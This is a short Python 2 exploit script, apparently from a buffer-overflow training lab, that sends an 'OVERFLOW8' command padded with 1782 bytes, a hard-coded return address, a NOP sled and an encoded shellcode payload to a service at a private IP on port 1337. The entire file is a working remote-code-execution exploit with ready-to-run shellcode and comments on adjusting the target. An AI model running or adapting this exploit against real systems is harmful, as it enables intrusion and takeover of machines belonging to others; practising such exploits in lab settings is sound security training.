Shellcode_exploit_6.py

#!/usr/bin/python
import sys, socket

overflow = (
"\xdb\xd9\xbd\xa5\x84\xf5\xd2\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x6f\x17\x83\xef\xfc\x03\xca\x97\x17\x27\xe8\x70\x55"
"\xc8\x10\x81\x3a\x40\xf5\xb0\x7a\x36\x7e\xe2\x4a\x3c\xd2\x0f"
"\x20\x10\xc6\x84\x44\xbd\xe9\x2d\xe2\x9b\xc4\xae\x5f\xdf\x47"
"\x2d\xa2\x0c\xa7\x0c\x6d\x41\xa6\x49\x90\xa8\xfa\x02\xde\x1f"
"\xea\x27\xaa\xa3\x81\x74\x3a\xa4\x76\xcc\x3d\x85\x29\x46\x64"
"\x05\xc8\x8b\x1c\x0c\xd2\xc8\x19\xc6\x69\x3a\xd5\xd9\xbb\x72"
"\x16\x75\x82\xba\xe5\x87\xc3\x7d\x16\xf2\x3d\x7e\xab\x05\xfa"
"\xfc\x77\x83\x18\xa6\xfc\x33\xc4\x56\xd0\xa2\x8f\x55\x9d\xa1"
"\xd7\x79\x20\x65\x6c\x85\xa9\x88\xa2\x0f\xe9\xae\x66\x4b\xa9"
"\xcf\x3f\x31\x1c\xef\x5f\x9a\xc1\x55\x14\x37\x15\xe4\x77\x50"
"\xda\xc5\x87\xa0\x74\x5d\xf4\x92\xdb\xf5\x92\x9e\x94\xd3\x65"
"\xe0\x8e\xa4\xf9\x1f\x31\xd5\xd0\xdb\x65\x85\x4a\xcd\x05\x4e"
"\x8a\xf2\xd3\xc1\xda\x5c\x8c\xa1\x8a\x1c\x7c\x4a\xc0\x92\xa3"
"\x6a\xeb\x78\xcc\x01\x16\xeb\xf9\xc4\x1c\x7f\x95\xe4\x1c\x6e"
"\x3a\x60\xfa\xfa\xd2\x24\x55\x93\x4b\x6d\x2d\x02\x93\xbb\x48"
"\x04\x1f\x48\xad\xcb\xe8\x25\xbd\xbc\x18\x70\x9f\x6b\x26\xae"
"\xb7\xf0\xb5\x35\x47\x7e\xa6\xe1\x10\xd7\x18\xf8\xf4\xc5\x03"
"\x52\xea\x17\xd5\x9d\xae\xc3\x26\x23\x2f\x81\x13\x07\x3f\x5f"
"\x9b\x03\x6b\x0f\xca\xdd\xc5\xe9\xa4\xaf\xbf\xa3\x1b\x66\x57"
"\x35\x50\xb9\x21\x3a\xbd\x4f\xcd\x8b\x68\x16\xf2\x24\xfd\x9e"
"\x8b\x58\x9d\x61\x46\xd9\xbd\x83\x42\x14\x56\x1a\x07\x95\x3b"
"\x9d\xf2\xda\x45\x1e\xf6\xa2\xb1\x3e\x73\xa6\xfe\xf8\x68\xda"
"\x6f\x6d\x8e\x49\x8f\xa4")

# 625011af = \xaf\x11\x50\x62 (in reverse format for x86 architecture)

shellcode = "A" * 1782 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow # add the exact match value after "A" and later pointer address after exact match value

	
try:

 		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 		s.connect(('10.10.224.209', 1337)) # change ip and port here
		s.send(('OVERFLOW8 /.:/') + shellcode)
 		s.close
except:
 		print "Error connecting to server"
 		sys.exit()